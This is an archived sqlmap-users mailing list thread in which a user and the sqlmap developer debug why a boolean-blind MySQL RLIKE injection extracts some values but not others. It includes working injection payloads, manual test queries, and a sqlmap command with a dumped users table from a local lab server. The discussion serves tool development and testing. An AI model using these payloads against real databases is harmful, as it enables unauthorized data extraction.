Re: [sqlmap-users] Trying to figure out why boolean RLIKE only works sometimes

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 454-5900

"I only bring it up because sql map has no problem grabbing the database
with rlike but can't enumerate the values from the user table"

$ python sqlmap.py -u "http://192.168.223.129/sqlmap/mysql/get_int.php?id=1"
--batch --test-filter="RLIKE" --dump -D testdb -T users

...

sqlmap identified the following injection points with a total of 0 HTTP(s)
reque
sts:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
GROUP BY
 clause
    Payload: id=1 RLIKE (SELECT (CASE WHEN (7668=7668) THEN 1 ELSE 0x28
END))
---
...

[14:14:52] [INFO] postprocessing table dump
Database: testdb
Table: users
[5 entries]
+----+--------+-----------------------------------------+
| id | name   | surname                                 |
+----+--------+-----------------------------------------+
| 1  | luther | blissett                                |
| 2  | fluffy | bunny                                   |
| 3  | wu     | ming                                    |
| 4  | NULL   | nameisnull                              |
| 5  | md5    | 098f6bcd4621d373cade4e832627b4f6 (test) |
+----+--------+-----------------------------------------+

On Sat, Feb 21, 2015 at 10:59 PM, Brandon Perry <bpe...@gm...>
wrote:

> Right, in the sql statement where I select 'a', the ord of this is not
> greater than 112, and it fails as expected with parens not balanced.
>
> The query below this that selects the first name from users should be
> functionally equivalent to select 'a' as mid is used to select the first
> character of the first username which is 'admin' as shown, but this
> statement does not fail as expected.
>
> I am at a loss as to why the latter does not fail when the inner select is
> functionally equivalent to select 'a', and the former fails as expected.
>
> I only bring it up because sql map has no problem grabbing the database
> with rlike but can't enumerate the values from the user table, and I logged
> into the server as root to try to figure out what the issue might be and
> this seems to be the root cause.
>
> Sent from a phone
>
> On Feb 21, 2015, at 3:35 PM, Miroslav Stampar <mir...@gm...>
> wrote:
>
> Hi.
>
> Maybe I've mistaken, but you are looking this RLIKE wrong. Its function
> here (in your case) is to PROVOKE errors on False, and that's exactly
> what's going on here.
>
> In case of True, RLIKE is called with perfectly valid 0x7474747474, while
> in case of False its called with errorneous regexp 0x28 ('parentheses not
> balanced').
>
> Bye
>
> On Sat, Feb 21, 2015 at 8:21 PM, Brandon Perry <bpe...@gm...>
> wrote:
>
>> Have an injection that I can use RLIKE to induce a 500 error, but it only
>> works in some circumstances. Enumerating the DATABASE() value works, as
>> well as the current user, but enumerating values from the database tables
>> fails. Even as root on the box, the RLIKE query fails to throw an exception
>> when attempting to use RLIKE in some instances.
>>
>> As you can see in the output below, the user can select the first name
>> value from the users table (which is ‘admin’). When using RLIKE to test the
>> first character returned with DATABASE() (a ‘p’), you get the parentheses
>> not balanced exception as expected. You also get this exception when simply
>> selecting ‘a’.
>>
>> But when you select the first row from the users table and grab the first
>> character (an ‘a’), no exception is thrown and an empty result set is
>> returned.
>>
>> Any thoughts?
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT DATABASE()),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT 'a'),1,1)) > 112) THEN 0x7474747474 ELSE 0x28 END));
>> ERROR 1139 (42000): Got error 'parentheses not balanced' from regexp
>>
>> mysql> SELECT 'm' FROM DUAL WHERE 1=1 RLIKE (SELECT (CASE WHEN
>> (ORD(MID((SELECT `name` from users LIMIT 0,1),1,1)) > 112) THEN
>> 0x7474747474 ELSE 0x28 END));
>> Empty set (0.01 sec)
>>
>> mysql> SELECT `name` from users LIMIT 0,1;
>> +-------+
>> | name  |
>> +-------+
>> | admin |
>> +-------+
>> 1 row in set (0.00 sec)
>>
>> mysql>
>>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=190641631&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>


-- 
Miroslav Stampar
http://about.me/stamparm